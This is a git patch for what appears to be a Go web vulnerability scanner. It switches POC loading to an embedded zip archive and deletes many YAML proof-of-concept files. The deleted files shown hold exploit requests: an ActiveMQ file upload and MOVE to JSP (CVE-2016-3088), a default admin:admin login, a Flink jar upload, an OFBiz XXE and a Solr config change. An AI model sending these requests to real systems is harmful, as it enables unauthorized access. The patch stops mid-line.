From 7095bd20be69af3b5acde11b5977f599d67c2f7c Mon Sep 17 00:00:00 2001 From: "LAPTOP-VVINFKMQ\\JohnDoe" Date: Mon, 26 Jul 2021 11:15:39 +0800 Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E6=94=B9pocs=E5=8A=A0=E8=BD=BD?= =?UTF-8?q?=E4=B8=BAzip=E5=8E=8B=E7=BC=A9=E5=8C=85?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- WebScan/lib/http.pb.go | 57 ++++++++- WebScan/pocs/activemq-cve-2016-3088.yml | 34 ----- WebScan/pocs/activemq-default-password.yml | 16 --- WebScan/pocs/alibaba-canal-info-leak.yml | 12 -- WebScan/pocs/alibaba-nacos-api-unauth.yml | 15 --- WebScan/pocs/alibaba-nacos.yml | 13 -- WebScan/pocs/apache-flink-upload-rce.yml | 38 ------ ...fbiz-cve-2020-9496-xml-deserialization.yml | 19 --- WebScan/pocs/apache-solr-file-read.yml | 21 ---- .../pocs/apacheofbiz-cve-2018-8033-xxe.yml | 15 --- .../pocs/bt742-pma-unauthorized-access.yml | 11 -- WebScan/pocs/cisco-cve-2020-3452-readfile.yml | 11 -- WebScan/pocs/coremail-cnvd-2019-16798.yml | 12 -- WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml | 22 ---- WebScan/pocs/dlink-cve-2019-17506.yml | 14 --- ...link-cve-2020-25078-account-disclosure.yml | 12 -- .../dlink-cve-2020-9376-dump-credentials.yml | 15 --- WebScan/pocs/dlink-dcs-info-leak.yml | 9 -- WebScan/pocs/docker-api-unauthorized-rce.yml | 12 -- WebScan/pocs/docker-registry-api-unauth.yml | 16 --- WebScan/pocs/druid-monitor-unauth.yml | 10 -- WebScan/pocs/drupal-cve-2014-3704-sqli.yml | 14 --- WebScan/pocs/drupal-cve-2018-7600-rce.yml | 19 --- WebScan/pocs/drupal-cve-2018-7600-rce2.yml | 29 ----- WebScan/pocs/drupal-cve-2019-6340.yml | 33 ----- WebScan/pocs/drupal-drupal7geddon2-rce.yml | 28 ----- WebScan/pocs/drupal-drupal8geddon2-rce.yml | 20 --- WebScan/pocs/ecology-sqli.yml | 13 -- WebScan/pocs/ecology-validate-sqli.yml | 17 --- WebScan/pocs/ecology-workflowservicexml-2.yml | 20 --- WebScan/pocs/ecology-workflowservicexml.yml | 20 --- WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml | 13 -- WebScan/pocs/ecshop-rce.yml | 17 --- WebScan/pocs/ecshop-rce2.yml | 17 --- WebScan/pocs/elasticsearch-unauth.yml | 16 --- WebScan/pocs/exchange-cve-2021-26855-ssrf.yml | 14 --- WebScan/pocs/eyou-rce.yml | 15 --- WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml | 16 --- WebScan/pocs/fangweicms-sqli.yml | 13 -- .../finereport-v8-arbitrary-file-read.yml | 11 -- WebScan/pocs/flir-ax8-file-read.yml | 11 -- .../pocs/gitlab-cnvd-2021-14193-infoleak.yml | 15 --- WebScan/pocs/h3c-secparh-any-user-login.yml | 10 -- WebScan/pocs/hikvision-cve-2017-7921.yml | 11 -- WebScan/pocs/iis6.0-put.yml | 21 ---- WebScan/pocs/jboss-cve-2010-1871.yml | 15 --- WebScan/pocs/jboss-unauth.yml | 11 -- WebScan/pocs/jenkins-cve-2018-1000861-rce.yml | 14 --- WebScan/pocs/jenkins-unauthorized-access.yml | 21 ---- WebScan/pocs/jumpserver-unauth-rce.yml | 21 ---- WebScan/pocs/jumpserver-unauth-rce2.yml | 21 ---- WebScan/pocs/kingsoft-v8-default-password.yml | 12 -- WebScan/pocs/kingsoft-v8-file-read.yml | 12 -- .../pocs/landray-oa-custom-jsp-fileread-2.yml | 11 -- .../pocs/landray-oa-custom-jsp-fileread.yml | 11 -- WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml | 12 -- WebScan/pocs/laravel-debug-info-leak.yml | 11 -- WebScan/pocs/laravel-improper-webdir.yml | 11 -- WebScan/pocs/mongo-express-cve-2019-10758.yml | 21 ---- WebScan/pocs/netentsec-ngfw-rce.yml | 19 --- WebScan/pocs/nexus-cve-2019-7238.yml | 20 --- WebScan/pocs/nexus-cve-2020-10199.yml | 21 ---- WebScan/pocs/nexus-cve-2020-10204.yml | 20 --- WebScan/pocs/nexus-default-password.yml | 22 ---- ...pmyadmin-cve-2018-12613-file-inclusion.yml | 11 -- .../pocs/phpmyadmin-setup-deserialization.yml | 13 -- WebScan/pocs/phpstudy-backdoor-rce.yml | 19 --- .../pocs/poc-yaml-weblogic-console-weak.yml | 29 ----- WebScan/pocs/pocs.zip | Bin 0 -> 89914 bytes .../qizhi-fortressaircraft-unauthorized.yml | 12 -- WebScan/pocs/rockmongo-default-password.yml | 12 -- WebScan/pocs/ruijie-eg-info-leak.yml | 24 ---- WebScan/pocs/ruijie-eg-rce.yml | 29 ----- .../ruijie-nbr1300g-cli-password-leak.yml | 15 --- WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml | 20 --- WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml | 11 -- .../saltstack-cve-2021-25282-file-write.yml | 22 ---- .../sangfor-edr-arbitrary-admin-login.yml | 13 -- WebScan/pocs/sangfor-edr-cssp-rce.yml | 15 --- WebScan/pocs/sangfor-edr-tool-rce.yml | 14 --- WebScan/pocs/seeyon-a6-employee-info-leak.yml | 11 -- WebScan/pocs/seeyon-a6-test-jsp-sql.yml | 13 -- .../pocs/seeyon-ajax-unauthorized-access.yml | 16 --- .../pocs/seeyon-cnvd-2020-62422-readfile.yml | 11 -- WebScan/pocs/seeyon-session-leak.yml | 10 -- WebScan/pocs/seeyon-setextno-jsp-sql.yml | 13 -- WebScan/pocs/seeyon-unauthoried.yml | 19 --- WebScan/pocs/showdoc-uploadfile.yml | 25 ---- WebScan/pocs/solr-cve-2019-0193.yml | 30 ----- WebScan/pocs/solr-fileread1.yml | 25 ---- WebScan/pocs/solr-fileread2.yml | 25 ---- WebScan/pocs/solr-velocity-template-rce.yml | 38 ------ WebScan/pocs/sonicwall-ssl-vpn-rce.yml | 16 --- .../pocs/spring-actuator-heapdump-file.yml | 12 -- WebScan/pocs/spring-cloud-cve-2020-5405.yml | 15 --- WebScan/pocs/spring-cloud-cve-2020-5410.yml | 12 -- WebScan/pocs/spring-cve-2016-4977.yml | 15 --- WebScan/pocs/spring-heapdump-file.yml | 12 -- WebScan/pocs/springboot-env-unauth.yml | 9 -- WebScan/pocs/springboot-env-unauth2.yml | 9 -- WebScan/pocs/springcloud-cve-2019-3799.yml | 14 --- WebScan/pocs/struts2-045-1.yml | 15 --- WebScan/pocs/struts2-045-2.yml | 12 -- WebScan/pocs/struts2-046-1.yml | 16 --- WebScan/pocs/swagger-ui-unauth-No1.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No2.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No3.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No4.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No5.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No6.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No7.yml | 10 -- WebScan/pocs/swagger-ui-unauth-No8.yml | 10 -- WebScan/pocs/thinkadmin-v6-readfile.yml | 13 -- WebScan/pocs/thinkcmf-lfi.yml | 13 -- WebScan/pocs/thinkcmf-write-shell.yml | 18 --- WebScan/pocs/thinkphp-v6-file-write.yml | 26 ---- WebScan/pocs/thinkphp5-controller-rce.yml | 10 -- WebScan/pocs/thinkphp5023-method-rce.yml | 13 -- WebScan/pocs/tianqing-info-leak.yml | 9 -- WebScan/pocs/tomcat-cve-2017-12615-rce.yml | 22 ---- WebScan/pocs/tomcat-cve-2018-11759.yml | 16 --- WebScan/pocs/tomcat-manager-weak.yml | 31 ----- .../tongda-meeting-unauthorized-access.yml | 16 --- .../pocs/tongda-user-session-disclosure.yml | 16 --- .../ueditor-cnvd-2017-20077-file-upload.yml | 17 --- WebScan/pocs/vengd-upload-rce.yml | 25 ---- .../vmware-vcenter-arbitrary-file-read.yml | 11 -- .../vmware-vcenter-arbitrary-file-read2.yml | 11 -- .../vmware-vcenter-cve-2021-21985-rce.yml | 17 --- ...center-unauthorized-rce-cve-2021-21972.yml | 16 --- .../vmware-vrealize-cve-2021-21975-ssrf.yml | 15 --- .../pocs/weaver-ebridge-file-read-linux.yml | 19 --- .../pocs/weaver-ebridge-file-read-windows.yml | 19 --- .../pocs/weaver-oa-arbitrary-file-upload.yml | 24 ---- WebScan/pocs/weblogic-cve-2020-14750.yml | 12 -- WebScan/pocs/weblogic-ssrf.yml | 11 -- WebScan/pocs/weblogic-v10-cve-2017-10271.yml | 20 --- WebScan/pocs/weblogic-v12-cve-2019-2725.yml | 20 --- WebScan/pocs/webmin-cve-2019-15107-rce.yml | 18 --- .../wordpress-cve-2019-19985-infoleak.yml | 11 -- .../wordpress-ext-adaptive-images-lfi.yml | 13 -- WebScan/pocs/wordpress-ext-mailpress-rce.yml | 23 ---- .../yongyou-erp-nc-directory-traversal.yml | 10 -- WebScan/pocs/yongyou-u8-oa-sqli.yml | 13 -- WebScan/pocs/yonyou-grp-u8-sqli-to-rce.yml | 16 --- WebScan/pocs/yonyou-grp-u8-sqli.yml | 15 --- .../yonyou-nc6.5-arbitrary-file-upload.yml | 26 ---- WebScan/pocs/zabbix-authentication-bypass.yml | 11 -- WebScan/pocs/zabbix-cve-2016-10134-sqli.yml | 14 --- go.mod | 17 +-- go.sum | 119 +++++++++++++++--- 151 files changed, 169 insertions(+), 2412 deletions(-) delete mode 100644 WebScan/pocs/activemq-cve-2016-3088.yml delete mode 100644 WebScan/pocs/activemq-default-password.yml delete mode 100644 WebScan/pocs/alibaba-canal-info-leak.yml delete mode 100644 WebScan/pocs/alibaba-nacos-api-unauth.yml delete mode 100644 WebScan/pocs/alibaba-nacos.yml delete mode 100644 WebScan/pocs/apache-flink-upload-rce.yml delete mode 100644 WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml delete mode 100644 WebScan/pocs/apache-solr-file-read.yml delete mode 100644 WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml delete mode 100644 WebScan/pocs/bt742-pma-unauthorized-access.yml delete mode 100644 WebScan/pocs/cisco-cve-2020-3452-readfile.yml delete mode 100644 WebScan/pocs/coremail-cnvd-2019-16798.yml delete mode 100644 WebScan/pocs/discuz-ml3x-cnvd-2019-22239.yml delete mode 100644 WebScan/pocs/dlink-cve-2019-17506.yml delete mode 100644 WebScan/pocs/dlink-cve-2020-25078-account-disclosure.yml delete mode 100644 WebScan/pocs/dlink-cve-2020-9376-dump-credentials.yml delete mode 100644 WebScan/pocs/dlink-dcs-info-leak.yml delete mode 100644 WebScan/pocs/docker-api-unauthorized-rce.yml delete mode 100644 WebScan/pocs/docker-registry-api-unauth.yml delete mode 100644 WebScan/pocs/druid-monitor-unauth.yml delete mode 100644 WebScan/pocs/drupal-cve-2014-3704-sqli.yml delete mode 100644 WebScan/pocs/drupal-cve-2018-7600-rce.yml delete mode 100644 WebScan/pocs/drupal-cve-2018-7600-rce2.yml delete mode 100644 WebScan/pocs/drupal-cve-2019-6340.yml delete mode 100644 WebScan/pocs/drupal-drupal7geddon2-rce.yml delete mode 100644 WebScan/pocs/drupal-drupal8geddon2-rce.yml delete mode 100644 WebScan/pocs/ecology-sqli.yml delete mode 100644 WebScan/pocs/ecology-validate-sqli.yml delete mode 100644 WebScan/pocs/ecology-workflowservicexml-2.yml delete mode 100644 WebScan/pocs/ecology-workflowservicexml.yml delete mode 100644 WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml delete mode 100644 WebScan/pocs/ecshop-rce.yml delete mode 100644 WebScan/pocs/ecshop-rce2.yml delete mode 100644 WebScan/pocs/elasticsearch-unauth.yml delete mode 100644 WebScan/pocs/exchange-cve-2021-26855-ssrf.yml delete mode 100644 WebScan/pocs/eyou-rce.yml delete mode 100644 WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml delete mode 100644 WebScan/pocs/fangweicms-sqli.yml delete mode 100644 WebScan/pocs/finereport-v8-arbitrary-file-read.yml delete mode 100644 WebScan/pocs/flir-ax8-file-read.yml delete mode 100644 WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml delete mode 100644 WebScan/pocs/h3c-secparh-any-user-login.yml delete mode 100644 WebScan/pocs/hikvision-cve-2017-7921.yml delete mode 100644 WebScan/pocs/iis6.0-put.yml delete mode 100644 WebScan/pocs/jboss-cve-2010-1871.yml delete mode 100644 WebScan/pocs/jboss-unauth.yml delete mode 100644 WebScan/pocs/jenkins-cve-2018-1000861-rce.yml delete mode 100644 WebScan/pocs/jenkins-unauthorized-access.yml delete mode 100644 WebScan/pocs/jumpserver-unauth-rce.yml delete mode 100644 WebScan/pocs/jumpserver-unauth-rce2.yml delete mode 100644 WebScan/pocs/kingsoft-v8-default-password.yml delete mode 100644 WebScan/pocs/kingsoft-v8-file-read.yml delete mode 100644 WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml delete mode 100644 WebScan/pocs/landray-oa-custom-jsp-fileread.yml delete mode 100644 WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml delete mode 100644 WebScan/pocs/laravel-debug-info-leak.yml delete mode 100644 WebScan/pocs/laravel-improper-webdir.yml delete mode 100644 WebScan/pocs/mongo-express-cve-2019-10758.yml delete mode 100644 WebScan/pocs/netentsec-ngfw-rce.yml delete mode 100644 WebScan/pocs/nexus-cve-2019-7238.yml delete mode 100644 WebScan/pocs/nexus-cve-2020-10199.yml delete mode 100644 WebScan/pocs/nexus-cve-2020-10204.yml delete mode 100644 WebScan/pocs/nexus-default-password.yml delete mode 100644 WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml delete mode 100644 WebScan/pocs/phpmyadmin-setup-deserialization.yml delete mode 100644 WebScan/pocs/phpstudy-backdoor-rce.yml delete mode 100644 WebScan/pocs/poc-yaml-weblogic-console-weak.yml create mode 100644 WebScan/pocs/pocs.zip delete mode 100644 WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml delete mode 100644 WebScan/pocs/rockmongo-default-password.yml delete mode 100644 WebScan/pocs/ruijie-eg-info-leak.yml delete mode 100644 WebScan/pocs/ruijie-eg-rce.yml delete mode 100644 WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml delete mode 100644 WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml delete mode 100644 WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml delete mode 100644 WebScan/pocs/saltstack-cve-2021-25282-file-write.yml delete mode 100644 WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml delete mode 100644 WebScan/pocs/sangfor-edr-cssp-rce.yml delete mode 100644 WebScan/pocs/sangfor-edr-tool-rce.yml delete mode 100644 WebScan/pocs/seeyon-a6-employee-info-leak.yml delete mode 100644 WebScan/pocs/seeyon-a6-test-jsp-sql.yml delete mode 100644 WebScan/pocs/seeyon-ajax-unauthorized-access.yml delete mode 100644 WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml delete mode 100644 WebScan/pocs/seeyon-session-leak.yml delete mode 100644 WebScan/pocs/seeyon-setextno-jsp-sql.yml delete mode 100644 WebScan/pocs/seeyon-unauthoried.yml delete mode 100644 WebScan/pocs/showdoc-uploadfile.yml delete mode 100644 WebScan/pocs/solr-cve-2019-0193.yml delete mode 100644 WebScan/pocs/solr-fileread1.yml delete mode 100644 WebScan/pocs/solr-fileread2.yml delete mode 100644 WebScan/pocs/solr-velocity-template-rce.yml delete mode 100644 WebScan/pocs/sonicwall-ssl-vpn-rce.yml delete mode 100644 WebScan/pocs/spring-actuator-heapdump-file.yml delete mode 100644 WebScan/pocs/spring-cloud-cve-2020-5405.yml delete mode 100644 WebScan/pocs/spring-cloud-cve-2020-5410.yml delete mode 100644 WebScan/pocs/spring-cve-2016-4977.yml delete mode 100644 WebScan/pocs/spring-heapdump-file.yml delete mode 100644 WebScan/pocs/springboot-env-unauth.yml delete mode 100644 WebScan/pocs/springboot-env-unauth2.yml delete mode 100644 WebScan/pocs/springcloud-cve-2019-3799.yml delete mode 100644 WebScan/pocs/struts2-045-1.yml delete mode 100644 WebScan/pocs/struts2-045-2.yml delete mode 100644 WebScan/pocs/struts2-046-1.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No1.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No2.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No3.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No4.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No5.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No6.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No7.yml delete mode 100644 WebScan/pocs/swagger-ui-unauth-No8.yml delete mode 100644 WebScan/pocs/thinkadmin-v6-readfile.yml delete mode 100644 WebScan/pocs/thinkcmf-lfi.yml delete mode 100644 WebScan/pocs/thinkcmf-write-shell.yml delete mode 100644 WebScan/pocs/thinkphp-v6-file-write.yml delete mode 100644 WebScan/pocs/thinkphp5-controller-rce.yml delete mode 100644 WebScan/pocs/thinkphp5023-method-rce.yml delete mode 100644 WebScan/pocs/tianqing-info-leak.yml delete mode 100644 WebScan/pocs/tomcat-cve-2017-12615-rce.yml delete mode 100644 WebScan/pocs/tomcat-cve-2018-11759.yml delete mode 100644 WebScan/pocs/tomcat-manager-weak.yml delete mode 100644 WebScan/pocs/tongda-meeting-unauthorized-access.yml delete mode 100644 WebScan/pocs/tongda-user-session-disclosure.yml delete mode 100644 WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml delete mode 100644 WebScan/pocs/vengd-upload-rce.yml delete mode 100644 WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml delete mode 100644 WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml delete mode 100644 WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml delete mode 100644 WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml delete mode 100644 WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml delete mode 100644 WebScan/pocs/weaver-ebridge-file-read-linux.yml delete mode 100644 WebScan/pocs/weaver-ebridge-file-read-windows.yml delete mode 100644 WebScan/pocs/weaver-oa-arbitrary-file-upload.yml delete mode 100644 WebScan/pocs/weblogic-cve-2020-14750.yml delete mode 100644 WebScan/pocs/weblogic-ssrf.yml delete mode 100644 WebScan/pocs/weblogic-v10-cve-2017-10271.yml delete mode 100644 WebScan/pocs/weblogic-v12-cve-2019-2725.yml delete mode 100644 WebScan/pocs/webmin-cve-2019-15107-rce.yml delete mode 100644 WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml delete mode 100644 WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml delete mode 100644 WebScan/pocs/wordpress-ext-mailpress-rce.yml delete mode 100644 WebScan/pocs/yongyou-erp-nc-directory-traversal.yml delete mode 100644 WebScan/pocs/yongyou-u8-oa-sqli.yml delete mode 100644 WebScan/pocs/yonyou-grp-u8-sqli-to-rce.yml delete mode 100644 WebScan/pocs/yonyou-grp-u8-sqli.yml delete mode 100644 WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml delete mode 100644 WebScan/pocs/zabbix-authentication-bypass.yml delete mode 100644 WebScan/pocs/zabbix-cve-2016-10134-sqli.yml diff --git a/WebScan/lib/http.pb.go b/WebScan/lib/http.pb.go index 1c36c53..51ba410 100644 --- a/WebScan/lib/http.pb.go +++ b/WebScan/lib/http.pb.go @@ -4,10 +4,14 @@ package lib import ( + "bytes" + "archive/zip" "embed" fmt "fmt" proto "github.com/golang/protobuf/proto" "gopkg.in/yaml.v3" + "io/ioutil" + "log" math "math" "strings" ) @@ -393,7 +397,28 @@ func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc { func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) { p := &Poc{} - yamlFile, err := Pocs.ReadFile("pocs/" + fileName) + + zByte, err := Pocs.ReadFile("pocs/pocs.zip") + zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte))) + if err != nil { + log.Fatal(err) + } + var unzippedFileBytes []byte + // Read all the files from zip archive + for _, zipFile := range zipReader.File { + if zipFile.Name == fileName { + unzippedFileBytes, err = readZipFile(zipFile) + if err != nil { + log.Println(err) + continue + } + break + } + + } + yamlFile := unzippedFileBytes + + //yamlFile, err := Pocs.ReadFile("pocs/" + fileName) if err != nil { return nil, err @@ -406,6 +431,23 @@ func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) { } func SelectPoc(Pocs embed.FS, pocname string) []string { + + + zByte, err := Pocs.ReadFile("pocs/pocs.zip") + zipReader, err := zip.NewReader(bytes.NewReader(zByte), int64(len(zByte))) + if err != nil { + log.Fatal(err) + } + var foundFiles []string + // Read all the files from zip archive + for _, entry := range zipReader.File { + if strings.Contains(entry.Name, pocname){ + foundFiles = append(foundFiles, entry.Name) + } + + } + + /* entries, err := Pocs.ReadDir("pocs") if err != nil { fmt.Println(err) @@ -416,5 +458,18 @@ func SelectPoc(Pocs embed.FS, pocname string) []string { foundFiles = append(foundFiles, entry.Name()) } } + + */ return foundFiles } + + + +func readZipFile(zf *zip.File) ([]byte, error) { + f, err := zf.Open() + if err != nil { + return nil, err + } + defer f.Close() + return ioutil.ReadAll(f) +} \ No newline at end of file diff --git a/WebScan/pocs/activemq-cve-2016-3088.yml b/WebScan/pocs/activemq-cve-2016-3088.yml deleted file mode 100644 index 7b93f13..0000000 --- a/WebScan/pocs/activemq-cve-2016-3088.yml +++ /dev/null @@ -1,34 +0,0 @@ -name: poc-yaml-activemq-cve-2016-3088 -set: - filename: randomLowercase(6) - fileContent: randomLowercase(6) -rules: - - method: PUT - path: /fileserver/{{filename}}.txt - body: | - {{fileContent}} - expression: | - response.status == 204 - - method: GET - path: /admin/test/index.jsp - search: | - activemq.home=(?P.*?), - follow_redirects: false - expression: | - response.status == 200 - - method: MOVE - path: /fileserver/{{filename}}.txt - headers: - Destination: "file://{{home}}/webapps/api/{{filename}}.jsp" - follow_redirects: false - expression: | - response.status == 204 - - method: GET - path: /api/{{filename}}.jsp - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(fileContent)) -detail: - author: j4ckzh0u(https://github.com/j4ckzh0u) - links: - - https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088 diff --git a/WebScan/pocs/activemq-default-password.yml b/WebScan/pocs/activemq-default-password.yml deleted file mode 100644 index d9a7ef9..0000000 --- a/WebScan/pocs/activemq-default-password.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-activemq-default-password -rules: - - method: GET - path: /admin/ - expression: | - response.status == 401 && response.body.bcontains(b"Unauthorized") - - method: GET - path: /admin/ - headers: - Authorization: Basic YWRtaW46YWRtaW4= - expression: | - response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"

Broker

") -detail: - author: pa55w0rd(www.pa55w0rd.online/) - links: - - https://blog.csdn.net/ge00111/article/details/72765210 \ No newline at end of file diff --git a/WebScan/pocs/alibaba-canal-info-leak.yml b/WebScan/pocs/alibaba-canal-info-leak.yml deleted file mode 100644 index a51de57..0000000 --- a/WebScan/pocs/alibaba-canal-info-leak.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-alibaba-canal-info-leak -rules: - - method: GET - path: /api/v1/canal/config/1/1 - follow_redirects: false - expression: | - response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey") -detail: - author: Aquilao(https://github.com/Aquilao) - info: alibaba Canal info leak - links: - - https://my.oschina.net/u/4581879/blog/4753320 \ No newline at end of file diff --git a/WebScan/pocs/alibaba-nacos-api-unauth.yml b/WebScan/pocs/alibaba-nacos-api-unauth.yml deleted file mode 100644 index 52512fb..0000000 --- a/WebScan/pocs/alibaba-nacos-api-unauth.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-alibaba-nacos-api-unauth -rules: - - method: GET - path: /nacos/v1/auth/users?pageNo=1&pageSize=9 - headers: - User-Agent: Nacos-Server - follow_redirects: true - expression: | - response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password")) -detail: - author: AgeloVito - info: alibaba-nacos-api-unauth - login: nacos/nacos - links: - - https://blog.csdn.net/caiqiiqi/article/details/112005424 diff --git a/WebScan/pocs/alibaba-nacos.yml b/WebScan/pocs/alibaba-nacos.yml deleted file mode 100644 index 34a4407..0000000 --- a/WebScan/pocs/alibaba-nacos.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-alibaba-nacos -rules: - - method: GET - path: /nacos/ - follow_redirects: true - expression: | - response.body.bcontains(bytes("Nacos")) -detail: - author: AgeloVito - info: alibaba-nacos - login: nacos/nacos - links: - - https://blog.csdn.net/caiqiiqi/article/details/112005424 diff --git a/WebScan/pocs/apache-flink-upload-rce.yml b/WebScan/pocs/apache-flink-upload-rce.yml deleted file mode 100644 index 6be7ca6..0000000 --- a/WebScan/pocs/apache-flink-upload-rce.yml +++ /dev/null @@ -1,38 +0,0 @@ -name: poc-yaml-apache-flink-upload-rce -set: - r1: randomLowercase(8) - r2: randomLowercase(4) -rules: - - method: GET - path: /jars - follow_redirects: true - expression: > - response.status == 200 && response.content_type.contains("json") && - response.body.bcontains(b"address") && response.body.bcontains(b"files") - - method: POST - path: /jars/upload - headers: - Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 - body: |- - --8ce4b16b22b58894aa86c421e8759df3 - Content-Disposition: form-data; name="jarfile";filename="{{r2}}.jar" - Content-Type:application/octet-stream - - {{r1}} - --8ce4b16b22b58894aa86c421e8759df3-- - - follow_redirects: true - expression: > - response.status == 200 && response.content_type.contains("json") && - response.body.bcontains(b"success") && response.body.bcontains(bytes(r2)) - search: >- - (?P([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar)) - - method: DELETE - path: '/jars/{{filen}}' - follow_redirects: true - expression: | - response.status == 200 -detail: - author: timwhite - links: - - https://github.com/LandGrey/flink-unauth-rce diff --git a/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml b/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml deleted file mode 100644 index c6ca0a9..0000000 --- a/WebScan/pocs/apache-ofbiz-cve-2020-9496-xml-deserialization.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-apache-ofbiz-cve-2020-9496-xml-deserialization -set: - rand: randomInt(200000000, 210000000) -rules: - - method: POST - path: /webtools/control/xmlrpc - headers: - Content-Type: application/xml - body: >- - {{rand}}dwisiswant0 - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(bytes("methodResponse")) && response.body.bcontains(bytes("No such service [" + string(rand))) -detail: - author: su(https://suzzz112113.github.io/#blog) - links: - - https://lists.apache.org/thread.html/r84ccbfc67bfddd35dced494a1f1cba504f49ac60a2a2ae903c5492c3%40%3Cdev.ofbiz.apache.org%3E - - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_ofbiz_deserialiation.rb diff --git a/WebScan/pocs/apache-solr-file-read.yml b/WebScan/pocs/apache-solr-file-read.yml deleted file mode 100644 index d1f6648..0000000 --- a/WebScan/pocs/apache-solr-file-read.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-apache-solr-file-read -rules: - - method: GET - path: "/solr/admin/cores?indexInfo=false&wt=json" - search: | - "name":"(?P.+?)", - expression: - response.status == 200 - - method: POST - path: "/solr/{{core_name}}/config" - headers: - Content-type: application/json - body: | - {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - expression: | - response.status == 200 && response.body.bcontains(b"This") -detail: - author: flyinbed - links: - - "https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg" - - "https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ" \ No newline at end of file diff --git a/WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml b/WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml deleted file mode 100644 index 51a6e22..0000000 --- a/WebScan/pocs/apacheofbiz-cve-2018-8033-xxe.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-apacheofbiz-cve-2018-8033-xxe -rules: - - method: POST - path: /webtools/control/xmlrpc - headers: - Content-Type: application/xml - body: >- - ]>&disclose; - follow_redirects: false - expression: > - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) && response.content_type.contains("text/xml") -detail: - author: su(https://suzzz112113.github.io/#blog) - links: - - https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py \ No newline at end of file diff --git a/WebScan/pocs/bt742-pma-unauthorized-access.yml b/WebScan/pocs/bt742-pma-unauthorized-access.yml deleted file mode 100644 index 5292fe8..0000000 --- a/WebScan/pocs/bt742-pma-unauthorized-access.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-bt742-pma-unauthorized-access -rules: - - method: GET - path: /pma/ - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"information_schema") && response.body.bcontains(b"phpMyAdmin") && response.body.bcontains(b"server_sql.php") -detail: - author: Facker007(https://github.com/Facker007) - links: - - https://mp.weixin.qq.com/s/KgAaFRKarMdycYzETyKS8A diff --git 